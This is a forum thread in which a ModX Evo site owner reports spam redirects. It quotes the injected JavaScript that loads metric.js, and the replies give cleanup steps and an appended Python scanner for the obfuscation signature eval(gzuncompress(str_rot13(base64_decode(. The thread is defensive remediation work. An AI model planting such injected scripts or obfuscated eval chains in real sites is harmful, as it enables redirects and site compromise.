
Site hacked: redirecting to other site?

@Murray432

Posted in: #Hacking #Redirects

I have a site that appears and works fine.

However if you search for it in Google a whole lot of other links come up, eg:

mysite.com/kamagra-viagra.html

Clicking this I get redirected to the Kamagra site.

I have scanned my site for viruses and can't find anything.

I am using the ModX Evo CMS.

Can anyone suggest a particular file I should be looking for that is causing this?

EDIT:

I have noticed some strange JavaScript in my header:

<script type="text/javascript" src="http://www.mysite.com/home.html?getjs=metric.js"></script>
<script type="text/javascript">var j1s = document.createElement('script');j1s.type = 'text/javascript';j1s.src = 'http://www.mysite.com/home.html?getjs=metric.js?getjs=metric.js';var h1ead = document.getElementsByTagName('head')[0];h1ead.appendChild(j1s);</script>


This is not in my template file, but appears when the page is loaded. I suspect this is the issue.


2 Comments


@Sent6035632

This is a hack that seems to have compromised several out-of-date MODx Evo installations. I've just fixed one; this is what needed doing:


1. In the MODx Manager, go to Elements > Manage Elements > Plugins > "Quick ManagerManager".
2. Search for the code @eval (@gzuncompress(@str_rot13(@base64_decode( (I found it near the bottom of the file).

   This is the encoded malicious code, which causes the metric.js script to be inserted into the top of your home page.

3. Remove this very large line and click save.
4. Now go to Plugins > "Highlight Search". This whole plugin seems to have been inserted by the attack.

   This causes the URLs like /best-website-kamagra on your website to redirect to another site. I found it by searching the database for str_rot13.

5. Delete this plugin.
6. Go to Elements > Manage Files > assets directory, and delete the 'cache' directory.
7. Upload a clean assets/cache directory from the MODx Evo distribution.

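The two searches described in the answer above (the nested eval decoder chain in a plugin, and str_rot13 in the database) can be run over every plugin at once. The following is an added example, not part of the original answer: it assumes the plugin rows have already been exported as (name, PHP source) pairs, and scan_plugins, the sample rows and the inclusion of gzinflate are assumptions made for illustration.

```python
import re

# Decoder functions named in the answer above; gzinflate is an added
# generalisation (same family as gzuncompress), not something the post mentions.
DECODERS = r"(?:gzuncompress|gzinflate|str_rot13|base64_decode)"

# eval( followed by one or more nested decoder calls. "@" error suppressors and
# whitespace are optional, and PHP function names are case-insensitive.
EVAL_CHAIN = re.compile(
    r"\beval\s*\(\s*((?:@?\s*" + DECODERS + r"\s*\(\s*)+)", re.IGNORECASE)
DECODER_CALL = re.compile(r"\b" + DECODERS + r"\s*\(", re.IGNORECASE)
ROT13_CALL = re.compile(r"\bstr_rot13\s*\(", re.IGNORECASE)


def scan_plugins(rows):
    """rows: iterable of (plugin_name, php_source). Returns a list of findings."""
    findings = []
    for name, code in rows:
        chains = list(EVAL_CHAIN.finditer(code))
        for m in chains:
            findings.append({
                "plugin": name,
                "kind": "eval-chain",
                "line": code.count("\n", 0, m.start()) + 1,  # 1-based line
                "depth": len(DECODER_CALL.findall(m.group(1))),  # nested calls
            })
        # No eval chain, but str_rot13 is present: flag for manual review,
        # which is how the answer located the second plugin.
        if not chains and ROT13_CALL.search(code):
            findings.append({"plugin": name, "kind": "rot13-only",
                             "line": None, "depth": 0})
    return findings


# Constructed sample rows (inert placeholders, not real plugin code or payloads).
SAMPLE_ROWS = [
    ("sample-injected", "<?php\n$e = &$modx->Event;\n// ...\n"
     "@eval (@gzuncompress(@str_rot13(@base64_decode('PLACEHOLDER'))));\n"),
    ("sample-rot13", "<?php\n$u = str_rot13($_SERVER['REQUEST_URI']);\n"),
    ("sample-clean", "<?php\n$logo = base64_decode($row['logo']);\n"),
]

if __name__ == "__main__":
    for finding in scan_plugins(SAMPLE_ROWS):
        print(finding)
```

A "rot13-only" hit is a prompt to read the plugin, not proof of compromise; a lone base64_decode call is deliberately not reported because legitimate code uses it.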


 

@Gretchen104

There are tons of possibilities. Your .htaccess file may be compromised and a redirect statement is being evaluated to send users away but that's a fairly blunt hack and easily found and fixed.

More likely is one or more of your CMS core files has had obfuscated code injected and that code runs on each access to both produce spam links for Googlebot consumption and also injects a JavaScript to send users away. The trick here is figuring out which file has been altered and how the attackers gained access and that process can be very difficult for non-security trained people to do.

Also a possibility is that the database containing the site content has been compromised and malicious codes injected there. This can be fatal to a site if you don't have proper safe backups of your content.

In any event, there are two basic questions that arise from a careful reading of the above scenarios:


How did they get in?
What did they change?


With the obvious follow-up being "How do I fix it?"

Unless you have a lot of experience diagnosing and fixing security problems, you may want to leave this to a professional. There are consultants who will do this as well as subscription-based services such as Stop The Hacker or Sucuri.
